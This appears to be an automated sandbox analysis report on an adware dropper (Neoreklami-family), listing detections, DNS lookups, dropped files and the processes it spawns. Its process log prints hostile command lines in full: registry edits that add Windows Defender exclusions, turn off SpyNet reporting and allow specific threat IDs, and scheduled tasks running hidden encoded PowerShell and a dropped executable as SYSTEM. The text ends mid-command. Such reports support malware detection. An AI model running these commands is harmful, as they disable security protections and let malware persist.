Source: file.exe |
ReversingLabs: Detection: 36% |
Source: C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exe |
Avira: detection malicious, Label: HEUR/AGEN.1209690 |
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe |
Avira: detection malicious, Label: HEUR/AGEN.1209690 |
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Avira: detection malicious, Label: HEUR/AGEN.1209690 |
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exe |
ReversingLabs: Detection: 40% |
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
ReversingLabs: Detection: 40% |
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe |
ReversingLabs: Detection: 40% |
Source: C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exe |
ReversingLabs: Detection: 40% |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040553A FindFirstFileA, |
0_2_0040553A |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, |
0_2_004055DE |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user~1\AppData\Local\Temp\7zSD636.tmp\__data__\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user~1\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user~1\AppData\Local\Temp\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user~1\AppData\Local\Temp\7zSD636.tmp\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user~1\AppData\Local\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user~1\AppData\ |
Source: Traffic |
Snort IDS: 2041922 ET MALWARE Win32/Adware.Neoreklami.MI Activity M2 192.168.2.7:49726 -> 54.191.228.37:80 |
Source: |
DNS query: api4.check-data.xyz |
Source: |
DNS query: api4.check-data.xyz |
Source: powershell.exe, 00000012.00000002.508261836.000002127BFC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.422385482.00000000031A0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000012.00000002.346158647.0000021262345000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000012.00000002.501402298.0000021273F0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000012.00000002.356255986.00000212640A3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000012.00000002.346924306.0000021263EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.422985802.00000000036E1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000012.00000002.356255986.00000212640A3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000012.00000002.356255986.00000212640A3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000012.00000002.501402298.0000021273F0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: unknown |
DNS traffic detected: queries for: www.testupdate.info |
Source: file.exe, 00000000.00000002.504759648.00000000007CA000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
|
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe |
Process created: Commandline size = 3260 |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
File deleted: C:\Windows\SysWOW64\GroupPolicyFpDoy |
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
File created: C:\Windows\system32\GroupPolicy\gpt.ini |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004162A6 |
0_2_004162A6 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040E5A5 |
0_2_0040E5A5 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004126B0 |
0_2_004126B0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00403A01 |
0_2_00403A01 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00418EF1 |
0_2_00418EF1 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00418FCB |
0_2_00418FCB |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_0693FC20 |
31_2_0693FC20 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_069378F0 |
31_2_069378F0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00403A9C appears 33 times |
|
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00413954 appears 177 times |
|
Source: file.exe, 00000000.00000000.241737223.0000000000427000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: file.exe |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe 6267F16C7A74D8C26F6D6CBE39E28044F55ECF16D82CBDFFBC1EFD3625393C42 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe 6267F16C7A74D8C26F6D6CBE39E28044F55ECF16D82CBDFFBC1EFD3625393C42 |
Source: Joe Sandbox View |
Dropped File: C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exe 6267F16C7A74D8C26F6D6CBE39E28044F55ECF16D82CBDFFBC1EFD3625393C42 |
Source: C:\Users\user\Desktop\file.exe |
File read: C:\Users\user\Desktop\file.exe |
Source: file.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\file.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exe .\Install.exe |
|
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe .\Install.exe /S /site_id "525403" |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gYzDOohkP" /SC once /ST 07:29:03 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gYzDOohkP" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gYzDOohkP" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bltLOfaNnqcomuNOFZ" /SC once /ST 16:17:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe\" 6Q /site_id 525403 /S" /V1 /F |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe 6Q /site_id 525403 /S |
|
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAc |